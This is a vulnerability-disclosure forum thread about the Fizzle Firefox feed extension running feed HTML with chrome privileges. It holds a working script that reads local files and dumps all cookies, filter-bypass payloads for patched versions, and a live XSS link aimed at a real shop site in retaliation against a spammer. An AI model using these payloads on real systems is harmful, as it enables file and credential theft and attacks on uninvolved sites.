Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Fizzle : Firefox Extension Vulnerability
Date: March 24, 2007 02:27PM

Fizzle allows feeds to use HTML in feed data, resulting in JavaScript being
run in the chrome: window with chrome permissions. The extension will
convert HTML entities back to their ASCII equivalents, thus &lt; becomes <
and so forth. Various feed fields are vulnerable, including the title, which
allows the code to execute when Fizzle is opened, with no need for the feed
to be viewed.

The author, Andy Frank, was notified about the issue on 01/29/2007. We
corresponded on the issue and I even offered to create a patch, which I did.
The patch did not meet his liking since the sanitation was too strict and
made some feeds which use certain tags like <p> for formatting lose their
layout. I told him it would be too difficult to sanitize the data unless it's
strict, because so many attack variations could be used, and the best thing to
do is not allow HTML at all in the feed. On 02/20/2007 we ended discussions
on this and I notified addons.mozilla.org about the problem and the
developer's lack of concern in fixing the extension or at least disabling
its download so people would not download the extension. Well, Mozilla
didn't bother to remove it and have chosen to remove the extension at a
future date when addons.mozilla.org is updated. Since then over 2,000+
users have additionally downloaded the extension, prompting me to go
full-disclosure about it.
Fizzle 0.5 (previous versions likely vulnerable as well)
https://addons.mozilla.org/firefox/1307/

Below is the example I have tested out using version 0.5 and under nightly
Firefox. Please note that the HTML entities must be present for the exploit
to work. Place the below in your feed body and subscribe to the feed. View
the feed in Fizzle. When testing make sure you clear the Fizzle cache in
the fizzle folder under the Firefox profile.

An attacker can check if a feed subscriber has Fizzle because Fizzle's HTTP
request sends a custom user-agent which has the word 'Fizzle' in it.
Detecting that keyword, an attacker can serve a malicious copy of the feed
instead.

--------------------------------------------------------------------------
POC: Local File Reading and Cookie Reading (The HTML entities MUST be used)
--------------------------------------------------------------------------
&lt;script&gt;

// Read an arbitrary local file through XPCOM. This only works because the
// feed markup is being rendered with chrome privileges.
function read(readfile)
{
    var file = Components.classes[&quot;@mozilla.org/file/local;1&quot;]
                         .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(readfile);
    var is = Components.classes[&quot;@mozilla.org/network/file-input-stream;1&quot;]
                       .createInstance(Components.interfaces.nsIFileInputStream);
    is.init(file, 0x01, 00004, null);   // 0x01 = PR_RDONLY, 00004 = read permission
    var sis = Components.classes[&quot;@mozilla.org/scriptableinputstream;1&quot;]
                        .createInstance(Components.interfaces.nsIScriptableInputStream);
    sis.init(is);
    var output = sis.read(sis.available());
    alert(output);
}
// The backslash has to be doubled: once the entities are decoded this is a JS
// string literal, and &quot;C:\test.txt&quot; would contain a tab, not a backslash.
read(&quot;C:\\test.txt&quot;);

// Dump every cookie in the profile via the cookie manager service.
function getCookies()
{
    var cookieManager = Components.classes[&quot;@mozilla.org/cookiemanager;1&quot;]
                                  .getService(Components.interfaces.nsICookieManager);
    var str = '';
    var iter = cookieManager.enumerator;
    while (iter.hasMoreElements())
    {
        var cookie = iter.getNext();
        if (cookie instanceof Components.interfaces.nsICookie)
        {
            str += &quot;Host: &quot; + cookie.host
                 + &quot;\nName: &quot; + cookie.name
                 + &quot;\nValue: &quot; + cookie.value
                 + &quot;\n\n&quot;;
        }
    }
    alert(str);
}
getCookies();

&lt;/script&gt;
--------------------------------------------------------------------------



Regards,
CM.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: rsnake
Date: March 24, 2007 03:15PM

Very nice find, CrYpTiC_MauleR! I posted about it on the blog as well. http://ha.ckers.org/blog/20070324/fizzle-firefox-extension-vulnerability/

- RSnake
Gotta love it. http://ha.ckers.org

Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 24, 2007 04:51PM

With 82 downloads per week this one is not exactly the most popular extension around :) Even Firefoxit has more downloads - and that extension has remote code execution as its concept. You can find lots of vulnerabilities like this one in the less popular extensions, that's why AMOv3 will introduce the sandbox concept so that only properly tested extensions will be publicly accessible.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: blad3
Date: March 25, 2007 01:39AM

Nice one CrYpTiC_MauleR!

@trev, AMOv3 = Mozilla Firefox v3? or?
do you have more info about this sandbox?



Re: Fizzle : Firefox Extension Vulnerability
Posted by: ma1
Date: March 25, 2007 03:33AM

blad3 Wrote:

> AMO v3 = Mozilla Firefox v3? or?

AMO v3 = http://addons.mozilla.org version 3

> do you have more info about this sandbox?

http://blog.mozilla.com/webdev/2007/03/23/reviewing-the-sandbox-and-missing-add-ons/

Fizzle is still there, by the way:
https://addons.mozilla.org/en-US/firefox/addon/1307

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Fizzle : Firefox Extension Vulnerability
Posted by: blad3
Date: March 25, 2007 04:40AM

thanks ma1 ;)

Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 25, 2007 09:01AM

Now that's wrong. I will ask for it to be moved back into the sandbox.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: jungsonn
Date: March 25, 2007 12:49PM

Nice one! This was the thing I feared most; to my knowledge it's the first find with extensions so far? And yes, it's easy to detect the extension in various ways.

Great job on this one.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 25, 2007 01:24PM

No, it is not the first one - there was quite some fuss about a GreaseMonkey vulnerability a while ago.

Re: Fizzle : Firefox Extension Vulnerability
Date: March 25, 2007 01:41PM

Quote
trev
No, it is not the first one - there was quite some fuss about a GreaseMonkey vulnerability a while ago.

Yeah, GM also allowed file reading. I'm sure there are dozens of extensions out there that don't properly sanitize external input and run the input with elevated privileges.

I wonder how many of the pentesting extensions are vulnerable. All in all, be careful what you install. The sad thing was the developer for Fizzle was totally aware of the code being able to run in chrome: and told me he just never bothered to fix it. Bad on his part for knowingly putting people at risk, and worse, letting 24,000 people download it. That's one of the main reasons the issue pissed me off.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 25, 2007 07:16PM

Yes, the same hole was fixed in NewsFox over a year ago. He was the developer of NewsFox as well, and I think the hole was fixed shortly after he handed the project over to another developer. I sent him two suggestions on how this can be fixed, one being pretty trivial (disable JavaScript and plugins in the content frame) - yet the answer was: "I am actually rewriting Fizzle from scratch to solve a host of problems (including this one)". Doesn't sound like this is urgent for him.

PS: There has been a bunch of cases where security vulnerabilities in extensions didn't reach the press. The most ugly one that I found were Conduit's generic toolbars - that was actually 93 extensions with a built-in backdoor. I don't think there ever was a statement from Conduit on this so one can argue whether this was malice or incredible incompetence, but I think it was the last straw that got them banned on addons.mozilla.org.



Re: Fizzle : Firefox Extension Vulnerability
Date: March 25, 2007 07:58PM

Interesting to know I was not the only one he basically lied to and shrugged off the issue. He also told me he was going to do a rewrite, don't know how many more people he will say that to before he actually does it =oP.

I'm not familiar with the process of extension submission to addon.mozilla.org. What kind of requirements must the extension have and go through before it's approved? Does every minor version get audited for backdoors, spyware, etc.? Because I've come across a couple of odd extensions that people claimed installed spyware on their systems.

If no checks are done then a disgruntled co-developer or developer for one of the popular extensions just needs to backdoor an update to essentially make a quick and easy botnet. I personally think if Mozilla doesn't implement a solution for this problem it may well be the downfall of Firefox as a more 'secure' browser than IE.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 25, 2007 08:34PM

So far there hasn't been anything resembling code review on AMO. Every minor release was to be reviewed, but the reviewer only installed the extension and checked that it worked, looked like it did what it promised and didn't fry his hard drive. Now with the sandbox model anybody can easily publish new extensions/new versions but they will only be visible in the sandbox (pretty hard to get there) so early adopters can try them out. To get into the public area you have to pass a review that is supposed to be stricter than what was there before. Originally only 200 add-ons were put into the public area automatically but now they had to do this for another 1000 or so because of the public outcry - that's how Fizzle got through. The idea now is to implement stricter checks gradually, some automatic vulnerability testing should come as well later. I am pushing thorough code reviews at least for the most popular extensions but this is something that will certainly take time. AMO has very limited resources and so far it doesn't look like they were too successful communicating this to Mozilla. AMO has a long history of disasters and I am afraid it isn't going to end just here.



Re: Fizzle : Firefox Extension Vulnerability
Posted by: jungsonn
Date: March 26, 2007 12:55AM

Someone got some links/advisories about these vulnerable extensions?

I like to write an article about it soon.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: WhiteAcid
Date: March 26, 2007 07:01AM

For the greasemonkey flaw read this: http://it.slashdot.org/article.pl?sid=05/07/19/143241

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 26, 2007 08:59AM

Here is an example of a Conduit toolbar: http://www.gotuit.com/scenemaker/scenemaker_ff.html. Use "Save link as" on the download link.

XPI is a regular ZIP file, extract the file chrome/gotuit.jar. That's a ZIP file as well, you will need content/ebtoolbar.js from there. The EBToolbarApi_CT436359 object is their "API" they inject into web pages as window.EBToolbarApi variable. Note the ExecuteFunction method - it will run any JavaScript code that it receives, and it will run it with the privileges of the browser rather than the web page it originated from. I thought this backdoor has been removed in newer versions of the toolbar but obviously it wasn't.

This toolbar has been created with Conduit's toolbar generator: http://www.conduit.com/. They all have this code, and I suspect that this goes for the variants for Internet Explorer as well (since those are binary code it is much more difficult to prove).

Re: Fizzle : Firefox Extension Vulnerability
Date: March 27, 2007 09:09PM

Oh no, Andy Frank the developer finally has gotten talking with Mozilla about fixing the extension. Well he has made a new version to fix the issue and emailed me a copy. Of course as I expected he did much better filtering but still allows HTML to be inserted. Example:

<![CDATA[ <img src='http://www.google.com/intl/en_ALL/images/logo.gif' onload='alert(1)' /> ]]>

Without the CDATA the IMG tag is stripped. Wish he would just strip all tags, the only way to be safe. Will keep you guys updated on this.

Re: Fizzle : Firefox Extension Vulnerability
Date: March 27, 2007 10:05PM

So his version 0.5.1 let the above pass, so he fixed it so it didn't. He sent me a copy of 0.5.2 and, well, the following works.

<![CDATA[ <iframe src='javascript:alert(0);'></iframe> ]]>

=o( making me depressed. I wish he would just listen to me. He's not doing whitelisting, he's doing blacklisting, which we all know is fruitless since you can't catch every bad thing that can be done.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 27, 2007 10:34PM

CrYpTiC_MauleR Wrote:
-------------------------------------------------------
> Oh no, Andy Frank the developer finally has gotten
> talking with Mozilla about fixing the extension.

I think "Mozilla" is me in that case :)

I am looking at his version 0.5.2 right now and I see the attempts to sanitize HTML. Now he uses a blacklist of forbidden attributes. I will try mailing him and explain to him again that instead of filtering JavaScript he can simply disable JavaScript.

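The sanitizer argument running through the posts above (decode the entities, then blacklist known-bad attributes, versus allowing no markup at all) is easy to see in code. The block below is an added example, not Fizzle's code and not anything the posters wrote: plain Node.js with no dependencies, the sample feed fields are constructed from the payloads quoted in this thread, and the short allowed-tag list is an assumption chosen to keep the `<p>` layout the developer was worried about.

```javascript
// Constructed sample feed field values, modelled on the payloads quoted in
// this thread (entity-encoded script, img onload, iframe with javascript: URL,
// and a harmless paragraph that should keep its formatting).
const SAMPLES = {
  entityScript: '&lt;script&gt;alert(1)&lt;/script&gt;',
  imgOnload: "<img src='http://www.google.com/intl/en_ALL/images/logo.gif' onload='alert(1)' />",
  iframeJs: "<iframe src='javascript:alert(0);'></iframe>",
  paragraph: '<p class="x">Plain &amp; simple</p>',
};

const NAMED_ENTITIES = { lt: '<', gt: '>', quot: '"', apos: "'", amp: '&' };

// What Fizzle did: turn &lt; back into <, including numeric references.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (whole, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      return String.fromCodePoint(parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    const name = body.toLowerCase();
    return name in NAMED_ENTITIES ? NAMED_ENTITIES[name] : whole;
  });
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Blacklist approach (the kind of filter being bypassed above): decode, then
// strip the constructs the author has thought of so far.
function blacklistSanitize(raw) {
  let html = decodeEntities(raw);
  html = html.replace(/<script\b[\s\S]*?<\/script\s*>/gi, '');
  html = html.replace(/\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
  return html;
}

// Whitelist approach: only bare tags from ALLOWED survive, every attribute is
// dropped, and everything else (unknown tags included) becomes escaped text.
// ALLOWED is an assumption for this example.
const ALLOWED = new Set(['p', 'br', 'b', 'i', 'em', 'strong']);

function whitelistSanitize(raw) {
  const decoded = decodeEntities(raw);
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g;
  let out = '';
  let last = 0;
  let m;
  while ((m = tagRe.exec(decoded)) !== null) {
    out += escapeHtml(decoded.slice(last, m.index));
    const [whole, slash, name] = m;
    const lower = name.toLowerCase();
    out += ALLOWED.has(lower) ? `<${slash}${lower}>` : escapeHtml(whole);
    last = m.index + whole.length;
  }
  out += escapeHtml(decoded.slice(last));
  return out;
}

// A string is inert for this purpose if, after removing the bare allowed tags,
// no '<' is left that a chrome document could parse as markup.
function isInert(html) {
  const allowedRe = new RegExp('</?(' + [...ALLOWED].join('|') + ')>', 'gi');
  return !/</.test(html.replace(allowedRe, ''));
}

// Summary of both filters against every sample; returned rather than printed
// so it can be checked.
function report() {
  const rows = {};
  for (const [name, raw] of Object.entries(SAMPLES)) {
    rows[name] = {
      blacklistInert: isInert(blacklistSanitize(raw)),
      whitelistInert: isInert(whitelistSanitize(raw)),
    };
  }
  return rows;
}

console.log(report());
```

The blacklist catches the entity-encoded `<script>` and the `onload` handler it was written for but lets the `iframe src='javascript:'` through untouched, which is the 0.5.2 bypass above; the whitelist never emits a tag it did not decide to emit, so the remaining risk is confined to the short ALLOWED list rather than to whatever the next poster thinks of.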
Re: Fizzle : Firefox Extension Vulnerability
Posted by: rsnake
Date: March 27, 2007 11:18PM

Ugh... mail him the Cheat Sheet... clearly he's not understanding obfuscation.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Fizzle : Firefox Extension Vulnerability
Date: March 28, 2007 12:32AM

trev,
are you Mike or Daniel....or Andy O.O

I don't know why he doesn't just display the feed in about:blank or something. I've seen other extensions do that, would solve the whole problem. He can then allow JS and all and not worry about an attacker getting chrome privs.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: jungsonn
Date: March 31, 2007 12:37PM

@trev thanks for the links!

It's amazing to see that the code reviewers allow such practice, clearly not rigorous enough.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: April 03, 2007 06:55AM

CrYpTiC_MauleR, I suggested using about:blank as well - but this is a little more complicated to implement, so I was more counting on him disabling JavaScript, at least as a short-term solution. Ideally he would do both. It seems he already tried disabling JavaScript but that broke some functionality because he was writing some of his own JavaScript code into that frame. So I told him how he can move it out of the frame. Waiting now.

And no, I am neither Mike nor Daniel. It seems Mike has been mailing Andy as well without CC'ing me, didn't know about that.

Re: Fizzle : Firefox Extension Vulnerability
Date: April 03, 2007 05:23PM

Just happy the extension has been removed for the time being. Hopefully Andy will follow through on this and get the patch out as soon as possible so the 25K users will have a way to be safe...or put it on the back burner again and forget about it until someone reminds him.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: tx
Date: August 09, 2007 04:23PM

@NiceDeals: here you go http://www.nicedeals.co.uk/index.php?cPath=3&osCsid=%22%3E%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%5D%21%3E%3C%21%5B
Hope that helps, spammer!
EDIT: Stopped it from alerting like 40 times.

-tx @ lowtech-labs.org



Re: Fizzle : Firefox Extension Vulnerability
Posted by: Anonymous User
Date: August 09, 2007 05:25PM

TX: I deleted the messages, on next spam he will be blocked.

Re: Fizzle : Firefox Extension Vulnerability
Posted by: Anonymous User
Date: August 09, 2007 06:06PM

Hehe - already sent him a PM with several XSSes on his site... no answer yet
